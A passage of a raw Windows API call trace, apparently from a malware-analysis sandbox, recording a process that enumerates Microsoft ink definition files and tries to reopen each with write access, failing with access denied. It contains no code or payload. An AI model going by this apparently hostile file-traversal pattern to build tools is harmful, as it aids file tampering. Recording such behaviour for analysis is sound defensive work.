returned 1 [0083.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0083.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0083.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0083.094] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd4, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="auxpad.xml", cAlternateFileName="")) returned 1 [0083.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0083.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0083.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0083.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0083.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0083.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 [0083.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0083.095] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x786d0 [0083.095] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0638633, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.095] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x59a, dwReserved0=0x0, dwReserved1=0x0, cFileName="auxbase.xml", cAlternateFileName="")) returned 1 [0083.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0083.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46748 [0083.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0083.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0083.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0083.095] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.095] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0083.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0083.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x814c8 [0083.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x814c8 | out: hHeap=0x20000) returned 1 [0083.096] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.096] AreFileApisANSI () returned 1 [0083.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", lpUsedDefaultChar=0x0) returned 84 [0083.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0083.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.096] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0083.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0083.096] AreFileApisANSI () returned 1 [0083.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0083.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x5f798 [0083.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x5f798, cchWideChar=84 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 84 [0083.096] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.097] GetFileType (hFile=0x340) returned 0x1 [0083.097] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0083.097] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.098] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.098] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.098] CloseHandle (hObject=0x340) returned 1 [0083.098] AreFileApisANSI () returned 1 [0083.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0083.098] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x60138 [0083.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71bd0, cbMultiByte=-1, lpWideCharStr=0x60138, cchWideChar=84 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 84 [0083.098] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.098] GetLastError () returned 0x5 [0083.098] GetLastError () returned 0x5 [0083.098] SetLastError (dwErrCode=0x5) [0083.098] GetLastError () returned 0x5 [0083.098] SetLastError (dwErrCode=0x5) [0083.098] GetLastError () returned 0x5 [0083.098] SetLastError (dwErrCode=0x5) [0083.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0083.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0083.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0083.099] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.099] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.099] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0xa6, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x812a8, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0xa6, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ֚̓")) returned 0 [0083.099] FindClose (in: hFindFile=0x786d0 | out: hFindFile=0x786d0) returned 1 [0083.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0083.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0083.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0083.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0083.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0083.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.099] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0083.099] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.100] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.100] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.100] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.100] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.100] AreFileApisANSI () returned 1 [0083.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml", lpUsedDefaultChar=0x0) returned 76 [0083.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0083.100] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.100] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0083.100] AreFileApisANSI () returned 1 [0083.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0083.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x84fe0 [0083.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x84fe0, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 76 [0083.100] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.101] GetFileType (hFile=0x42c) returned 0x1 [0083.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fe0 | out: hHeap=0x20000) returned 1 [0083.102] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.102] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.102] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.103] CloseHandle (hObject=0x42c) returned 1 [0083.103] AreFileApisANSI () returned 1 [0083.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0083.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x98) returned 0x851c0 [0083.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x851c0, cchWideChar=76 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml") returned 76 [0083.103] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.103] GetLastError () returned 0x5 [0083.103] GetLastError () returned 0x5 [0083.103] SetLastError (dwErrCode=0x5) [0083.103] GetLastError () returned 0x5 [0083.103] SetLastError (dwErrCode=0x5) [0083.103] GetLastError () returned 0x5 [0083.103] SetLastError (dwErrCode=0x5) [0083.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x851c0 | out: hHeap=0x20000) returned 1 [0083.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0083.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0083.103] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.103] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.103] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0638c00, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a354279, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="insert", cAlternateFileName="")) returned 1 [0083.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0083.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8afe0 [0083.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0083.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0083.104] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.104] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.104] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.104] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0083.104] AreFileApisANSI () returned 1 [0083.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert", lpUsedDefaultChar=0x0) returned 72 [0083.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0083.104] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.104] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0083.104] AreFileApisANSI () returned 1 [0083.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0083.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0083.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x8a790, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert") returned 72 [0083.104] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\insert" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\insert"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.104] GetLastError () returned 0x5 [0083.105] GetLastError () returned 0x5 [0083.105] SetLastError (dwErrCode=0x5) [0083.105] GetLastError () returned 0x5 [0083.105] SetLastError 